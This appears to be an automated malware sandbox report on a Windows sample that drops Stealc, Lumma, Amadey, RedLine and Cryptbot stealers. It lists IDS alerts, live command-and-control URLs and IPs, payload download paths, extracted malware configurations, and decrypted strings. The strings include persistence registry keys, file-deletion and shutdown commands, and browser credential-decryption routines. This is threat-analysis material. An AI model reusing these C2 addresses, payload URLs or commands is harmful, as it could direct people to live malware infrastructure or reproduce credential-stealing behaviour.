ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:59.692597+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.10	49852	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:59.686601+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.10	49852	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:59.914782+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.10	49852	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:56:01.388921+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.10	49852	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:59.971591+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.10	49852	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:41.885503+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.10	49707	104.21.18.116	443	TCP
2025-02-02T07:57:32.360889+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.10	50035	104.21.79.9	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:55:59.458033+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.10	49852	185.215.113.115	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:05.606266+0100	2856147	1	A Network Trojan was detected	192.168.2.10	50017	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:15.678165+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.10	50018	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:08.546883+0100	2803305	3	Unknown Traffic	192.168.2.10	50019	185.215.113.97	80	TCP
2025-02-02T07:57:17.118319+0100	2803305	3	Unknown Traffic	192.168.2.10	50023	185.215.113.97	80	TCP
2025-02-02T07:57:22.449377+0100	2803305	3	Unknown Traffic	192.168.2.10	50028	185.215.113.97	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:56:01.932074+0100	2803304	3	Unknown Traffic	192.168.2.10	49852	185.215.113.115	80	TCP
2025-02-02T07:56:25.998234+0100	2803304	3	Unknown Traffic	192.168.2.10	50015	185.215.113.115	80	TCP
2025-02-02T07:56:27.071764+0100	2803304	3	Unknown Traffic	192.168.2.10	50015	185.215.113.115	80	TCP
2025-02-02T07:56:27.694301+0100	2803304	3	Unknown Traffic	192.168.2.10	50015	185.215.113.115	80	TCP
2025-02-02T07:56:28.277817+0100	2803304	3	Unknown Traffic	192.168.2.10	50015	185.215.113.115	80	TCP
2025-02-02T07:56:30.008256+0100	2803304	3	Unknown Traffic	192.168.2.10	50015	185.215.113.115	80	TCP
2025-02-02T07:56:30.472698+0100	2803304	3	Unknown Traffic	192.168.2.10	50015	185.215.113.115	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:35.063207+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.10	50038	103.84.89.222	33791	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-02T07:57:35.063207+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.10	50038	103.84.89.222	33791	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: L8ChrKrbqV.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.115/c4becf79229cb002.phpion:	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489?argument=0B	Avira URL Cloud: Label: malware
Source: .1.1home.fivegg5th.top	Avira URL Cloud: Label: malware
Source: 185.215.113.115/c4becf79229cb002.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php;.J	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php04b4252d7cee516b6a2d91e2bfb7a#e5#p	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/apiyX	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php809001	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489?argument=0:	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedai	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpIvWn	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpation	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php01	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/notfinancing/random.exe	Avira URL Cloud: Label: malware
Source: gPhome.fivegg5th.top	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA17382324896963	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/cc	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/apiingNameT	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/apiate	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/qE	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpe	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/SQL_gulong/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php_	Avira URL Cloud: Label: malware
Source: https://warlikedbeliev.org/T	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpG	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpD6#;7u	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/SQL_gulong/random.exe;	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 27.2.ab13ed0cb0.exe.3b0000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.7188.9.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}
Source: cab7dbccac.exe.7444.26.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}
Source: d40ec5ca11.exe.2916.25.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fivegg5th.top", ".1.1home.fivegg5th.top", "a.dnspod.comh.top", "gPhome.fivegg5th.top"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: L8ChrKrbqV.exe

Virustotal: Detection: 47%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: L8ChrKrbqV.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: 185.215.113.43
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: S-%lu-
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: abc3bc1985
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: skotes.exe
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Startup
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: rundll32
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Programs
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: %USERPROFILE%
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: cred.dll
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: clip.dll
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: http://
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: https://
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: /quiet
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: /Plugins/
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: &unit=
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: shell32.dll
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: kernel32.dll
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: ProgramData\
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: AVAST Software
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Kaspersky Lab
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Panda Security
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Doctor Web
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: 360TotalSecurity
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Bitdefender
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Norton
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Sophos
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Comodo
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: WinDefender
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: 0123456789
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: ------
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: ?scr=1
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: ComputerName
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: -unicode-
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: VideoID
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: ProductName
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: CurrentBuild
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: rundll32.exe
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: "taskkill /f /im "
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: " && timeout 1 && del
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: && Exit"
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: " && ren
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: Powershell.exe
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: shutdown -s -t 0
Source: 00000018.00000002.2526331279.00000000005B1000.00000040.00000001.01000000.0000000A.sdmp	String decryptor: random

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC4A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	9_2_6CC4A9A0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC444C0 PK11_PubEncrypt,	9_2_6CC444C0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC44440 PK11_PrivDecrypt,	9_2_6CC44440
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC14420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	9_2_6CC14420
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	9_2_6CC925B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC2E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	9_2_6CC2E6E0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC4A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	9_2_6CC4A650
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC28670 PK11_ExportEncryptedPrivKeyInfo,	9_2_6CC28670
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	9_2_6CC6A730
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC70180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	9_2_6CC70180
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC443B0 PK11_PubEncryptPKCS1,PR_SetError,	9_2_6CC443B0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC67C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	9_2_6CC67C00
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC27D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	9_2_6CC27D60
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	9_2_6CC6BD30
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC69EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	9_2_6CC69EC0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC43FF0 PK11_PrivDecryptPKCS1,	9_2_6CC43FF0
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC49840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	9_2_6CC49840
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC43850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	9_2_6CC43850
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC6DA40 SEC_PKCS7ContentIsEncrypted,	9_2_6CC6DA40
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC43560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	9_2_6CC43560
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Code function: 9_2_6CC3F050 PR_smprintf,SEC_CertNicknameConflict,strlen,realloc,memset,realloc,strlen,free,PR_smprintf,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PR_SetError,PR_GetCurrentThread,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,PK11_GenerateRandom,SECKEY_DestroyPrivateKey,PR_SetError,free,free,free,free,PK11_FindCertInSlot,PORT_NewArena_Util,free,PK11_ImportCert,PR_SetError,free,CERT_DestroyCertificate,PORT_FreeArena_Util,PR_GetCurrentThread,PORT_ArenaAlloc_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_GetCurrentThread,strlen,PR_SetError,PR_GetCurrentThread,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,PR_SetError,free,SECKEY_DestroyPrivateKey,SECKEY_DestroyEncryptedPrivateKeyInfo,PR_SetError,	9_2_6CC3F050

Source: d40ec5ca11.exe, 00000019.00000003.2290016247.00000000070B4000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_440f2d43-0

Source: L8ChrKrbqV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.10:49776 version: TLS 1.2
